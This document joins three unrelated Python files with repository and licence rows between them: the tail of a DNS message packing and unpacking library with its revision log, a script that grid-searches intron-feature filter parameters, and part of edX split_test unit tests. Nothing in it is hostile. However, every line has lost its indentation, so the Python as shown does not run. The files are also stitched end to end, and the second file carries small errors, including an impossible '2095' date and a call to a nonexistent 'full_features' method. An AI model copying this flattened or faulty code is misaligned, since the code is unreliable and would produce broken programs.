def get16bit(self):
return unpack16bit(self.getbytes(2))
def get32bit(self):
return unpack32bit(self.getbytes(4))
def getaddr(self):
return bin2addr(self.get32bit())
def getstring(self):
return self.getbytes(ord(self.getbyte()))
def getname(self):
# Domain name unpacking (section 4.1.4)
c = self.getbyte()
i = ord(c)
if i & 0xC0 == 0xC0:
d = self.getbyte()
j = ord(d)
pointer = ((i<<8) | j) & ~0xC000
save_offset = self.offset
try:
self.offset = pointer
domain = self.getname()
finally:
self.offset = save_offset
return domain
if i == 0:
return ''
domain = self.getbytes(i)
remains = self.getname()
if not remains:
return domain
else:
return domain + '.' + remains
# Test program for packin/unpacking (section 4.1.4)
def testpacker():
N = 2500
R = range(N)
import timing
# See section 4.1.4 of RFC 1035
timing.start()
for i in R:
p = Packer()
p.addaddr('192.168.0.1')
p.addbytes('*' * 20)
p.addname('f.ISI.ARPA')
p.addbytes('*' * 8)
p.addname('Foo.F.isi.arpa')
p.addbytes('*' * 18)
p.addname('arpa')
p.addbytes('*' * 26)
p.addname('')
timing.finish()
print timing.milli(), "ms total for packing"
print round(timing.milli() / i, 4), 'ms per packing'
#p.dump()
u = Unpacker(p.buf)
u.getaddr()
u.getbytes(20)
u.getname()
u.getbytes(8)
u.getname()
u.getbytes(18)
u.getname()
u.getbytes(26)
u.getname()
timing.start()
for i in R:
u = Unpacker(p.buf)
res = (u.getaddr(),
u.getbytes(20),
u.getname(),
u.getbytes(8),
u.getname(),
u.getbytes(18),
u.getname(),
u.getbytes(26),
u.getname())
timing.finish()
print timing.milli(), "ms total for unpacking"
print round(timing.milli() / i, 4), 'ms per unpacking'
#for item in res: print item
# Pack/unpack RR toplevel format (section 3.2.1)
class RRpacker(Packer):
def __init__(self):
Packer.__init__(self)
self.rdstart = None
def addRRheader(self, name, type, klass, ttl, *rest):
self.addname(name)
self.add16bit(type)
self.add16bit(klass)
self.add32bit(ttl)
if rest:
if rest[1:]: raise TypeError, 'too many args'
rdlength = rest[0]
else:
rdlength = 0
self.add16bit(rdlength)
self.rdstart = len(self.buf)
def patchrdlength(self):
rdlength = unpack16bit(self.buf[self.rdstart-2:self.rdstart])
if rdlength == len(self.buf) - self.rdstart:
return
rdata = self.buf[self.rdstart:]
save_buf = self.buf
ok = 0
try:
self.buf = self.buf[:self.rdstart-2]
self.add16bit(len(rdata))
self.buf = self.buf + rdata
ok = 1
finally:
if not ok: self.buf = save_buf
def endRR(self):
if self.rdstart is not None:
self.patchrdlength()
self.rdstart = None
def getbuf(self):
if self.rdstart is not None: self.patchrdlength()
return Packer.getbuf(self)
# Standard RRs (section 3.3)
def addCNAME(self, name, klass, ttl, cname):
self.addRRheader(name, Type.CNAME, klass, ttl)
self.addname(cname)
self.endRR()
def addHINFO(self, name, klass, ttl, cpu, os):
self.addRRheader(name, Type.HINFO, klass, ttl)
self.addstring(cpu)
self.addstring(os)
self.endRR()
def addMX(self, name, klass, ttl, preference, exchange):
self.addRRheader(name, Type.MX, klass, ttl)
self.add16bit(preference)
self.addname(exchange)
self.endRR()
def addNS(self, name, klass, ttl, nsdname):
self.addRRheader(name, Type.NS, klass, ttl)
self.addname(nsdname)
self.endRR()
def addPTR(self, name, klass, ttl, ptrdname):
self.addRRheader(name, Type.PTR, klass, ttl)
self.addname(ptrdname)
self.endRR()
def addSOA(self, name, klass, ttl,
mname, rname, serial, refresh, retry, expire, minimum):
self.addRRheader(name, Type.SOA, klass, ttl)
self.addname(mname)
self.addname(rname)
self.add32bit(serial)
self.add32bit(refresh)
self.add32bit(retry)
self.add32bit(expire)
self.add32bit(minimum)
self.endRR()
def addTXT(self, name, klass, ttl, list):
self.addRRheader(name, Type.TXT, klass, ttl)
if type(list) is types.StringType:
list = [list]
for txtdata in list:
self.addstring(txtdata)
self.endRR()
# Internet specific RRs (section 3.4) -- class = IN
def addA(self, name, klass, ttl, address):
self.addRRheader(name, Type.A, klass, ttl)
self.addaddr(address)
self.endRR()
def addWKS(self, name, ttl, address, protocol, bitmap):
self.addRRheader(name, Type.WKS, Class.IN, ttl)
self.addaddr(address)
self.addbyte(chr(protocol))
self.addbytes(bitmap)
self.endRR()
def addSRV(self):
raise NotImplementedError
def prettyTime(seconds):
if seconds<60:
return seconds,"%d seconds"%(seconds)
if seconds<3600:
return seconds,"%d minutes"%(seconds/60)
if seconds<86400:
return seconds,"%d hours"%(seconds/3600)
if seconds<604800:
return seconds,"%d days"%(seconds/86400)
else:
return seconds,"%d weeks"%(seconds/604800)
class RRunpacker(Unpacker):
def __init__(self, buf):
Unpacker.__init__(self, buf)
self.rdend = None
def getRRheader(self):
name = self.getname()
rrtype = self.get16bit()
klass = self.get16bit()
ttl = self.get32bit()
rdlength = self.get16bit()
self.rdend = self.offset + rdlength
return (name, rrtype, klass, ttl, rdlength)
def endRR(self):
if self.offset != self.rdend:
raise UnpackError, 'end of RR not reached'
def getCNAMEdata(self):
return self.getname()
def getHINFOdata(self):
return self.getstring(), self.getstring()
def getMXdata(self):
return self.get16bit(), self.getname()
def getNSdata(self):
return self.getname()
def getPTRdata(self):
return self.getname()
def getSOAdata(self):
return self.getname(), \
self.getname(), \
('serial',)+(self.get32bit(),), \
('refresh ',)+prettyTime(self.get32bit()), \
('retry',)+prettyTime(self.get32bit()), \
('expire',)+prettyTime(self.get32bit()), \
('minimum',)+prettyTime(self.get32bit())
def getTXTdata(self):
list = []
while self.offset != self.rdend:
list.append(self.getstring())
return list
getSPFdata = getTXTdata
def getAdata(self):
return self.getaddr()
def getWKSdata(self):
address = self.getaddr()
protocol = ord(self.getbyte())
bitmap = self.getbytes(self.rdend - self.offset)
return address, protocol, bitmap
def getSRVdata(self):
"""
_Service._Proto.Name TTL Class SRV Priority Weight Port Target
"""
priority = self.get16bit()
weight = self.get16bit()
port = self.get16bit()
target = self.getname()
#print '***priority, weight, port, target', priority, weight, port, target
return priority, weight, port, target
# Pack/unpack Message Header (section 4.1)
class Hpacker(Packer):
def addHeader(self, id, qr, opcode, aa, tc, rd, ra, z, rcode,
qdcount, ancount, nscount, arcount):
self.add16bit(id)
self.add16bit((qr&1)<<15 | (opcode&0xF)<<11 | (aa&1)<<10
| (tc&1)<<9 | (rd&1)<<8 | (ra&1)<<7
| (z&7)<<4 | (rcode&0xF))
self.add16bit(qdcount)
self.add16bit(ancount)
self.add16bit(nscount)
self.add16bit(arcount)
class Hunpacker(Unpacker):
def getHeader(self):
id = self.get16bit()
flags = self.get16bit()
qr, opcode, aa, tc, rd, ra, z, rcode = (
(flags>>15)&1,
(flags>>11)&0xF,
(flags>>10)&1,
(flags>>9)&1,
(flags>>8)&1,
(flags>>7)&1,
(flags>>4)&7,
(flags>>0)&0xF)
qdcount = self.get16bit()
ancount = self.get16bit()
nscount = self.get16bit()
arcount = self.get16bit()
return (id, qr, opcode, aa, tc, rd, ra, z, rcode,
qdcount, ancount, nscount, arcount)
# Pack/unpack Question (section 4.1.2)
class Qpacker(Packer):
def addQuestion(self, qname, qtype, qclass):
self.addname(qname)
self.add16bit(qtype)
self.add16bit(qclass)
class Qunpacker(Unpacker):
def getQuestion(self):
return self.getname(), self.get16bit(), self.get16bit()
# Pack/unpack Message(section 4)
# NB the order of the base classes is important for __init__()!
class Mpacker(RRpacker, Qpacker, Hpacker):
pass
class Munpacker(RRunpacker, Qunpacker, Hunpacker):
pass
# Routines to print an unpacker to stdout, for debugging.
# These affect the unpacker's current position!
def dumpM(u):
print 'HEADER:',
(id, qr, opcode, aa, tc, rd, ra, z, rcode,
qdcount, ancount, nscount, arcount) = u.getHeader()
print 'id=%d,' % id,
print 'qr=%d, opcode=%d, aa=%d, tc=%d, rd=%d, ra=%d, z=%d, rcode=%d,' \
% (qr, opcode, aa, tc, rd, ra, z, rcode)
if tc: print '*** response truncated! ***'
if rcode: print '*** nonzero error code! (%d) ***' % rcode
print ' qdcount=%d, ancount=%d, nscount=%d, arcount=%d' \
% (qdcount, ancount, nscount, arcount)
for i in range(qdcount):
print 'QUESTION %d:' % i,
dumpQ(u)
for i in range(ancount):
print 'ANSWER %d:' % i,
dumpRR(u)
for i in range(nscount):
print 'AUTHORITY RECORD %d:' % i,
dumpRR(u)
for i in range(arcount):
print 'ADDITIONAL RECORD %d:' % i,
dumpRR(u)
class DnsResult:
def __init__(self,u,args):
self.header={}
self.questions=[]
self.answers=[]
self.authority=[]
self.additional=[]
self.args=args
self.storeM(u)
def show(self):
import time
print '; <<>> PDG.py 1.0 <<>> %s %s'%(self.args['name'],
self.args['qtype'])
opt=""
if self.args['rd']:
opt=opt+'recurs '
h=self.header
print ';; options: '+opt
print ';; got answer:'
print ';; ->>HEADER<<- opcode %s, status %s, id %d'%(
h['opcode'],h['status'],h['id'])
flags=filter(lambda x,h=h:h[x],('qr','aa','rd','ra','tc'))
print ';; flags: %s; Ques: %d, Ans: %d, Auth: %d, Addit: %d'%(
string.join(flags),h['qdcount'],h['ancount'],h['nscount'],
h['arcount'])
print ';; QUESTIONS:'
for q in self.questions:
print ';; %s, type = %s, class = %s'%(q['qname'],q['qtypestr'],
q['qclassstr'])
print
print ';; ANSWERS:'
for a in self.answers:
print '%-20s %-6s %-6s %s'%(a['name'],`a['ttl']`,a['typename'],
a['data'])
print
print ';; AUTHORITY RECORDS:'
for a in self.authority:
print '%-20s %-6s %-6s %s'%(a['name'],`a['ttl']`,a['typename'],
a['data'])
print
print ';; ADDITIONAL RECORDS:'
for a in self.additional:
print '%-20s %-6s %-6s %s'%(a['name'],`a['ttl']`,a['typename'],
a['data'])
print
if self.args.has_key('elapsed'):
print ';; Total query time: %d msec'%self.args['elapsed']
print ';; To SERVER: %s'%(self.args['server'])
print ';; WHEN: %s'%time.ctime(time.time())
def storeM(self,u):
(self.header['id'], self.header['qr'], self.header['opcode'],
self.header['aa'], self.header['tc'], self.header['rd'],
self.header['ra'], self.header['z'], self.header['rcode'],
self.header['qdcount'], self.header['ancount'],
self.header['nscount'], self.header['arcount']) = u.getHeader()
self.header['opcodestr']=Opcode.opcodestr(self.header['opcode'])
self.header['status']=Status.statusstr(self.header['rcode'])
for i in range(self.header['qdcount']):
#print 'QUESTION %d:' % i,
self.questions.append(self.storeQ(u))
for i in range(self.header['ancount']):
#print 'ANSWER %d:' % i,
self.answers.append(self.storeRR(u))
for i in range(self.header['nscount']):
#print 'AUTHORITY RECORD %d:' % i,
self.authority.append(self.storeRR(u))
for i in range(self.header['arcount']):
#print 'ADDITIONAL RECORD %d:' % i,
self.additional.append(self.storeRR(u))
def storeQ(self,u):
q={}
q['qname'], q['qtype'], q['qclass'] = u.getQuestion()
q['qtypestr']=Type.typestr(q['qtype'])
q['qclassstr']=Class.classstr(q['qclass'])
return q
def storeRR(self,u):
r={}
r['name'],r['type'],r['class'],r['ttl'],r['rdlength'] = u.getRRheader()
r['typename'] = Type.typestr(r['type'])
r['classstr'] = Class.classstr(r['class'])
#print 'name=%s, type=%d(%s), class=%d(%s), ttl=%d' \
# % (name,
# type, typename,
# klass, Class.classstr(class),
# ttl)
mname = 'get%sdata' % r['typename']
if hasattr(u, mname):
r['data']=getattr(u, mname)()
else:
r['data']=u.getbytes(r['rdlength'])
return r
def dumpQ(u):
qname, qtype, qclass = u.getQuestion()
print 'qname=%s, qtype=%d(%s), qclass=%d(%s)' \
% (qname,
qtype, Type.typestr(qtype),
qclass, Class.classstr(qclass))
def dumpRR(u):
name, type, klass, ttl, rdlength = u.getRRheader()
typename = Type.typestr(type)
print 'name=%s, type=%d(%s), class=%d(%s), ttl=%d' \
% (name,
type, typename,
klass, Class.classstr(klass),
ttl)
mname = 'get%sdata' % typename
if hasattr(u, mname):
print ' formatted rdata:', getattr(u, mname)()
else:
print ' binary rdata:', u.getbytes(rdlength)
if __name__ == "__main__":
testpacker()
#
# $Log: Lib.py,v $
# Revision 1.11.2.7 2009/06/09 18:39:06 customdesigned
# Built-in SPF support
#
# Revision 1.11.2.6 2008/10/15 22:34:06 customdesigned
# Default to idna encoding.
#
# Revision 1.11.2.5 2008/09/17 17:35:14 customdesigned
# Use 7-bit ascii encoding, because case folding needs to be disabled
# before utf8 is safe to use, even experimentally.
#
# Revision 1.11.2.4 2008/09/17 16:09:53 customdesigned
# Encode unicode labels as UTF-8
#
# Revision 1.11.2.3 2007/05/22 20:27:40 customdesigned
# Fix unpacker underflow.
#
# Revision 1.11.2.2 2007/05/22 20:25:53 customdesigned
# Use socket.inetntoa,inetaton.
#
# Revision 1.11.2.1 2007/05/22 20:20:39 customdesigned
# Mark utf-8 encoding
#
# Revision 1.11 2002/03/19 13:05:02 anthonybaxter
# converted to class based exceptions (there goes the python1.4 compatibility :)
#
# removed a quite gross use of 'eval()'.
#
# Revision 1.10 2002/03/19 12:41:33 anthonybaxter
# tabnannied and reindented everything. 4 space indent, no tabs.
# yay.
#
# Revision 1.9 2002/03/19 10:30:33 anthonybaxter
# first round of major bits and pieces. The major stuff here (summarised
# from my local, off-net CVS server :/ this will cause some oddities with
# the
#
# tests/testPackers.py:
# a large slab of unit tests for the packer and unpacker code in DNS.Lib
#
# DNS/Lib.py:
# placeholder for addSRV.
# added 'klass' to addA, make it the same as the other A* records.
# made addTXT check for being passed a string, turn it into a length 1 list.
# explicitly check for adding a string of length > 255 (prohibited).
# a bunch of cleanups from a first pass with pychecker
# new code for pack/unpack. the bitwise stuff uses struct, for a smallish
# (disappointly small, actually) improvement, while addr2bin is much
# much faster now.
#
# DNS/Base.py:
# added DiscoverNameServers. This automatically does the right thing
# on unix/ win32. No idea how MacOS handles this. *sigh*
# Incompatible change: Don't use ParseResolvConf on non-unix, use this
# function, instead!
# a bunch of cleanups from a first pass with pychecker
#
# Revision 1.8 2001/08/09 09:08:55 anthonybaxter
# added identifying header to top of each file
#
# Revision 1.7 2001/07/19 07:50:44 anthony
# Added SRV (RFC 2782) support. Code from Michael Ströder.
#
# Revision 1.6 2001/07/19 07:39:18 anthony
# 'type' -> 'rrtype' in getRRheader(). Fix from Michael Ströder.
#
# Revision 1.5 2001/07/19 07:34:19 anthony
# oops. glitch in storeRR (fixed now).
# Reported by Bastian Kleineidam and by greg lin.
#
# Revision 1.4 2001/07/19 07:16:42 anthony
# Changed (opcode&0xF)<<11 to (opcode*0xF)<<11.
# Patch from Timothy J. Miller.
#
# Revision 1.3 2001/07/19 06:57:07 anthony
# cvs keywords added
#
#
| mit |
ratschlab/RNA-geeq | SAFT/find_optimal_param_set.py | 1 | 11493 | """
This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
Written (W) 2095-2010 Andre Kahles
Copyright (C) 2009-2010 by Friedrich Miescher Laboratory, Tuebingen, Germany
This script finds an optimal parameter set to maximize the performance of a
given intronfeature file.
For detailed usage information type:
python find_optimal_param_set.py
"""
import sys
import cPickle
class Feature(object):
"""Is an intron feature object"""
def __init__(self, max_mm=80, feature_string=''):
if feature_string == '':
self.alignment_support = 0
self.submission_support = 1
self.mm_ex = dict()
self.max_mm = max_mm + 1
else:
self.alignment_support = int(feature_string[0])
self.submission_support = int(feature_string[1])
self.mm_ex = dict()
self.max_mm = max_mm + 1
for _sl in feature_string[2:]:
(key, value) = _sl.split(':')
self.mm_ex[key] = int(value)
def merge_features(self, feature_string):
"""Merges information in feature_string into current feature object"""
self.alignment_support += int(feature_string[0])
self.submission_support += int(feature_string[1])
for _sl in feature_string[2:]:
(key, value) = _sl.split(':')
try:
self.mm_ex[key] += int(value)
except KeyError:
self.mm_ex[key] = int(value)
def add_mm_ex(self, ex, mm):
"""Adds mm ex information"""
self.alignment_support += 1
try:
self.mm_ex[(ex*self.max_mm) + mm] += 1
except KeyError:
self.mm_ex[(ex*self.max_mm) + mm] = 1
def get_feature_string(self):
"""Returns string with mm ex elements."""
_line = (str(self.alignment_support) + '\t' + str(self.submission_support) + '\t')
for key in self.mm_ex:
_line += (str(key) + ':' + str(self.mm_ex[key]) + '\t')
return _line[:-1]
def get_submission_support(self):
"""Returns submission support"""
return int(self.submission_support)
def is_valid(self, mm, ex, mc, options):
"""Returns true, if at least one alignment fulfills the requirements with respect to mm, ex, and mc. False otherwise."""
if self.alignment_support < mc:
return False
is_valid = False
for key in self.mm_ex.keys():
_ex = int(key) / (options.max_feat_mismatches + 1)
_mm = int(key) % (options.max_feat_mismatches + 1)
if _mm <= mm and _ex >= ex:
is_valid = True
break
return is_valid
def parse_options(argv):
"""Parses options from the command line """
from optparse import OptionParser, OptionGroup
parser = OptionParser()
required = OptionGroup(parser, 'REQUIRED')
required.add_option('-b', '--best_score', dest='best_scores', metavar='FILE', help='file to store the best scoring parameters', default='-')
required.add_option('-m', '--matrix', dest='matrix', metavar='FILE', help='file to store the full performance matrix', default='-')
required.add_option('-f', '--features', dest='features', metavar='FILE', help='alignment intron features', default='-')
required.add_option('-i', '--annotation_introns', dest='anno_int', metavar='FILE', help='annotation intron list', default='-')
optional = OptionGroup(parser, 'OPTIONAL')
optional.add_option('-E', '--exclude_introns', dest='exclude_introns', metavar='STRINGLIST', help='list of comma separated intron files to exclude from submitted features', default='-')
optional.add_option('-I', '--max_intron_len', dest='max_intron_len', metavar='INT', type='int', help='maximal intron length [10000000]', default=10000000)
optional.add_option('-s', '--ignore_strand', dest='ignore_strand', action='store_true', help='ignore strand information present in annotation', default=False)
optional.add_option('-X', '--max_feat_mismatches', dest='max_feat_mismatches', metavar='INT', type='int', help='max number of mismatches for feat generation [80] (do only change, if you are absolutely sure!)', default=80)
optional.add_option('-v', '--verbose', dest='verbose', action='store_true', help='verbosity', default=False)
parser.add_option_group(required)
parser.add_option_group(optional)
(options, args) = parser.parse_args()
if len(argv) < 2:
parser.print_help()
sys.exit(2)
return options
def get_performance_value(full_features, mm, ex, mc, annotation_list, options):
"""Builds up a filtered intron list from the given alignment features and compares to the annotation."""
alignment_list = dict()
for feat in full_features.keys():
chrm = feat[0]
intron = (0, int(feat[1]), int(feat[2]))
### filter step
if (intron[2] - intron[1]) > options.max_intron_len:
continue
if not full_features[feat].is_valid(mm, ex, mc, options):
continue
try:
alignment_list[chrm][intron] = 0
except KeyError:
alignment_list[chrm] = {intron:0}
### match intron lists
total_precision = float(0)
total_recall = float(0)
key_count = 0
for chrm in annotation_list.keys():
if alignment_list.has_key(chrm):
matches = len(set(annotation_list[chrm].keys()).intersection(set(alignment_list[chrm].keys())))
total_precision += (float(matches) / float(max(1, len(alignment_list[chrm].keys()))))
total_recall += (float(matches) / float(max(1, len(annotation_list[chrm].keys()))))
### do not include chromosomes with zero values into average
if matches > 0:
key_count += 1
total_precision /= max(1.0, float(key_count))
total_recall /= max(1.0, float(key_count))
return (total_precision, total_recall)
def main():
"""Main function extracting intron features."""
options = parse_options(sys.argv)
### get list of annotated introns
annotation_list = cPickle.load(open(options.anno_int, 'r'))
if options.ignore_strand:
for chrm in annotation_list.keys():
skiplist = set()
for intron in annotation_list[chrm].keys():
if intron[0] == 0:
continue
annotation_list[chrm][(0, intron[1], intron[2])] = annotation_list[chrm][intron]
skiplist.add(intron)
for intron in skiplist:
del annotation_list[chrm][intron]
del skiplist
### filter annotation for max intron length
print '\nFiltering intron list for max intron len'
print '-----------------------------------------'
skipped = 0
for chrm in annotation_list.keys():
skiplist = set()
for intron in annotation_list[chrm].keys():
if (intron[2] - intron[1]) > options.max_intron_len:
skiplist.add(intron)
for intron in skiplist:
del annotation_list[chrm][intron]
skipped += len(skiplist)
print '%s introns removed from annotation' % skipped
del skiplist
full_features = dict()
if options.verbose:
print 'Parsing %s' % options.features
line_counter = 0
for line in open(options.features, 'r'):
if options.verbose and line_counter % 1000 == 0:
print 'parsed %i features from %s' % (line_counter, options.features)
line_counter += 1
sl = line.strip().split('\t')
(chrm, start, stop) = sl[:3]
try:
full_features[(chrm, start, stop)].full_features(sl[3:])
except KeyError:
full_features[(chrm, start, stop)] = Feature(80, sl[3:])
### filter full feature list for excluded introns
if options.exclude_introns != '-':
_ex_introns = options.exclude_introns.strip().split(',')
### handle leading or trailing commas
if _ex_introns[0] == '':
_ex_introns = _ex_introns[1:]
if _ex_introns[-1] == '':
_ex_introns = _ex_introns[:-1]
for _infile in _ex_introns:
_ex_intron = cPickle.load(open(_infile, 'r'))
for chrm in _ex_intron.keys():
for _intron in _ex_intron[chrm].keys():
try:
del full_features[(chrm, str(_intron[1]), str(_intron[2]))]
except KeyError:
continue
del _ex_intron
if options.verbose:
print 'Parsing completed.'
print 'parsed %i features from %s' % (line_counter, options.features)
### SEARCH SPACE
### iterate over different filter dimensions
#ex_list = [2, 4, 6, 8, 10, 12, 15, 20, 25, 30] # 10
#ex_list = [2, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18 ] # 15
ex_list = [1, 2, 4, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 18 ] # 15
mm_list = [0, 1, 2, 3, 4, 5, 6] # 7
mc_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10] # 10 ==> 700 combinations
checked_combs = 0
# pre rec fsc
max_pre = (0.0, 0.0, 0.0)
max_rec = (0.0, 0.0, 0.0)
max_fsc = (0.0, 0.0, 0.0)
max_pre_idx = (0, 0, 0)
max_rec_idx = (0, 0, 0)
max_fsc_idx = (0, 0, 0)
matrix_file = open(options.matrix, 'w')
for ex in ex_list:
for mm in mm_list:
for mc in mc_list:
if options.verbose and checked_combs % 10 == 0:
print 'checked %i parameter combinations' % checked_combs
print 'best scores so far:\n \tbest fScore: %0.2f, best recall: %0.2f, best precision: %0.2f' % (max_fsc[2], max_rec[1], max_pre[0])
checked_combs += 1
(pre, rec) = get_performance_value(full_features, mm, ex, mc, annotation_list, options)
if float(rec) + float(pre) > 0:
fsc = (2 * float(rec) * float(pre)) / (float(rec) + float(pre))
else:
fsc = 0.0
if pre > max_pre[0]:
max_pre = (pre, rec, fsc)
max_pre_idx = (ex, mm, mc)
if rec > max_rec[1]:
max_rec = (pre, rec, fsc)
max_rec_idx = (ex, mm, mc)
if fsc > max_fsc[2]:
max_fsc = (pre, rec, fsc)
max_fsc_idx = (ex, mm, mc)
### store information
### ex mm mc pre rec fsc
print >> matrix_file, '%s\t%s\t%s\t%s\t%s\t%s' % (ex, mm, mc, pre, rec, fsc)
matrix_file.close()
best_file = open(options.best_scores, 'w')
# best precision
print >> best_file, '%s\t%s\t%s\t%s\t%s\t%s' % (max_pre_idx[0], max_pre_idx[1], max_pre_idx[2], max_pre[0], max_pre[1], max_pre[2])
# best recall
print >> best_file, '%s\t%s\t%s\t%s\t%s\t%s' % (max_rec_idx[0], max_rec_idx[1], max_rec_idx[2], max_rec[0], max_rec[1], max_rec[2])
# best fScore
print >> best_file, '%s\t%s\t%s\t%s\t%s\t%s' % (max_fsc_idx[0], max_fsc_idx[1], max_fsc_idx[2], max_fsc[0], max_fsc[1], max_fsc[2])
best_file.close()
if __name__ == "__main__":
main()
| mit |
don-github/edx-platform | common/lib/xmodule/xmodule/tests/test_split_test_module.py | 44 | 23169 | """
Tests for the Split Testing Module
"""
import ddt
import lxml
from mock import Mock, patch
from fs.memoryfs import MemoryFS
from xmodule.partitions.tests.test_partitions import StaticPartitionService, PartitionTestCase, MockUserPartitionScheme
from xmodule.tests.xml import factories as xml
from xmodule.tests.xml import XModuleXmlImportTest
from xmodule.tests import get_test_system
from xmodule.x_module import AUTHOR_VIEW, STUDENT_VIEW
from xmodule.validation import StudioValidationMessage
from xmodule.split_test_module import SplitTestDescriptor, SplitTestFields, get_split_user_partitions
from xmodule.partitions.partitions import Group, UserPartition
class SplitTestModuleFactory(xml.XmlImportFactory):
"""
Factory for generating SplitTestModules for testing purposes
"""
tag = 'split_test'
class SplitTestUtilitiesTest(PartitionTestCase):
"""
Tests for utility methods related to split_test module.
"""
def test_split_user_partitions(self):
"""
Tests the get_split_user_partitions helper method.
"""
first_random_partition = UserPartition(
0, 'first_partition', 'First Partition', [Group("0", 'alpha'), Group("1", 'beta')],
self.random_scheme
)
second_random_partition = UserPartition(
0, 'second_partition', 'Second Partition', [Group("4", 'zeta'), Group("5", 'omega')],
self.random_scheme
)
all_partitions = [
first_random_partition,
# Only UserPartitions with scheme "random" will be returned as available options.
UserPartition(
1, 'non_random_partition', 'Will Not Be Returned', [Group("1", 'apple'), Group("2", 'banana')],
self.non_random_scheme
),
second_random_partition
]
self.assertEqual(
[first_random_partition, second_random_partition],
get_split_user_partitions(all_partitions)
)
class SplitTestModuleTest(XModuleXmlImportTest, PartitionTestCase):
"""
Base class for all split_module tests.
"""
def setUp(self):
super(SplitTestModuleTest, self).setUp()
self.course_id = 'test_org/test_course_number/test_run'
# construct module
course = xml.CourseFactory.build()
sequence = xml.SequenceFactory.build(parent=course)
split_test = SplitTestModuleFactory(
parent=sequence,
attribs={
'user_partition_id': '0',
'group_id_to_child': '{"0": "i4x://edX/xml_test_course/html/split_test_cond0", "1": "i4x://edX/xml_test_course/html/split_test_cond1"}'
}
)
xml.HtmlFactory(parent=split_test, url_name='split_test_cond0', text='HTML FOR GROUP 0')
xml.HtmlFactory(parent=split_test, url_name='split_test_cond1', text='HTML FOR GROUP 1')
self.course = self.process_xml(course)
self.course_sequence = self.course.get_children()[0]
self.module_system = get_test_system()
self.module_system.descriptor_runtime = self.course._runtime # pylint: disable=protected-access
self.course.runtime.export_fs = MemoryFS()
user = Mock(username='ma', email='ma@edx.org', is_staff=False, is_active=True)
self.partitions_service = StaticPartitionService(
[
self.user_partition,
UserPartition(
1, 'second_partition', 'Second Partition',
[Group("0", 'abel'), Group("1", 'baker'), Group("2", 'charlie')],
MockUserPartitionScheme()
)
],
user=user,
course_id=self.course.id,
track_function=Mock(name='track_function'),
)
self.module_system._services['partitions'] = self.partitions_service # pylint: disable=protected-access
self.split_test_module = self.course_sequence.get_children()[0]
self.split_test_module.bind_for_student(
self.module_system,
user.id
)
@ddt.ddt
class SplitTestModuleLMSTest(SplitTestModuleTest):
"""
Test the split test module
"""
@ddt.data((0, 'split_test_cond0'), (1, 'split_test_cond1'))
@ddt.unpack
def test_child(self, user_tag, child_url_name):
self.user_partition.scheme.current_group = self.user_partition.groups[user_tag]
self.assertEquals(self.split_test_module.child_descriptor.url_name, child_url_name)
@ddt.data((0, 'HTML FOR GROUP 0'), (1, 'HTML FOR GROUP 1'))
@ddt.unpack
def test_get_html(self, user_tag, child_content):
self.user_partition.scheme.current_group = self.user_partition.groups[user_tag]
self.assertIn(
child_content,
self.module_system.render(self.split_test_module, STUDENT_VIEW).content
)
@ddt.data(0, 1)
def test_child_missing_tag_value(self, _user_tag):
# If user_tag has a missing value, we should still get back a valid child url
self.assertIn(self.split_test_module.child_descriptor.url_name, ['split_test_cond0', 'split_test_cond1'])
@ddt.data(100, 200, 300, 400, 500, 600, 700, 800, 900, 1000)
def test_child_persist_new_tag_value_when_tag_missing(self, _user_tag):
# If a user_tag has a missing value, a group should be saved/persisted for that user.
# So, we check that we get the same url_name when we call on the url_name twice.
# We run the test ten times so that, if our storage is failing, we'll be most likely to notice it.
self.assertEquals(self.split_test_module.child_descriptor.url_name, self.split_test_module.child_descriptor.url_name)
# Patch the definition_to_xml for the html children.
@patch('xmodule.html_module.HtmlDescriptor.definition_to_xml')
def test_export_import_round_trip(self, def_to_xml):
# The HtmlDescriptor definition_to_xml tries to write to the filesystem
# before returning an xml object. Patch this to just return the xml.
def_to_xml.return_value = lxml.etree.Element('html')
# Mock out the process_xml
# Expect it to return a child descriptor for the SplitTestDescriptor when called.
self.module_system.process_xml = Mock()
# Write out the xml.
xml_obj = self.split_test_module.definition_to_xml(MemoryFS())
self.assertEquals(xml_obj.get('user_partition_id'), '0')
self.assertIsNotNone(xml_obj.get('group_id_to_child'))
# Read the xml back in.
fields, children = SplitTestDescriptor.definition_from_xml(xml_obj, self.module_system)
self.assertEquals(fields.get('user_partition_id'), '0')
self.assertIsNotNone(fields.get('group_id_to_child'))
self.assertEquals(len(children), 2)
class SplitTestModuleStudioTest(SplitTestModuleTest):
"""
Unit tests for how split test interacts with Studio.
"""
@patch('xmodule.split_test_module.SplitTestDescriptor.group_configuration_url', return_value='http://example.com')
def test_render_author_view(self, group_configuration_url):
"""
Test the rendering of the Studio author view.
"""
def create_studio_context(root_xblock):
"""
Context for rendering the studio "author_view".
"""
return {
'reorderable_items': set(),
'root_xblock': root_xblock,
}
# The split_test module should render both its groups when it is the root
context = create_studio_context(self.split_test_module)
html = self.module_system.render(self.split_test_module, AUTHOR_VIEW, context).content
self.assertIn('HTML FOR GROUP 0', html)
self.assertIn('HTML FOR GROUP 1', html)
# When rendering as a child, it shouldn't render either of its groups
context = create_studio_context(self.course_sequence)
html = self.module_system.render(self.split_test_module, AUTHOR_VIEW, context).content
self.assertNotIn('HTML FOR GROUP 0', html)
self.assertNotIn('HTML FOR GROUP 1', html)
# The "Create Missing Groups" button should be rendered when groups are missing
context = create_studio_context(self.split_test_module)
self.split_test_module.user_partitions = [
UserPartition(0, 'first_partition', 'First Partition',
[Group("0", 'alpha'), Group("1", 'beta'), Group("2", 'gamma')])
]
html = self.module_system.render(self.split_test_module, AUTHOR_VIEW, context).content
self.assertIn('HTML FOR GROUP 0', html)
self.assertIn('HTML FOR GROUP 1', html)
def test_group_configuration_url(self):
"""
Test creation of correct Group Configuration URL.
"""
mocked_course = Mock(advanced_modules=['split_test'])
mocked_modulestore = Mock()
mocked_modulestore.get_course.return_value = mocked_course
self.split_test_module.system.modulestore = mocked_modulestore
self.split_test_module.user_partitions = [
UserPartition(0, 'first_partition', 'First Partition', [Group("0", 'alpha'), Group("1", 'beta')])
]
expected_url = '/group_configurations/edX/xml_test_course/101#0'
self.assertEqual(expected_url, self.split_test_module.group_configuration_url)
def test_editable_settings(self):
"""
Test the setting information passed back from editable_metadata_fields.
"""
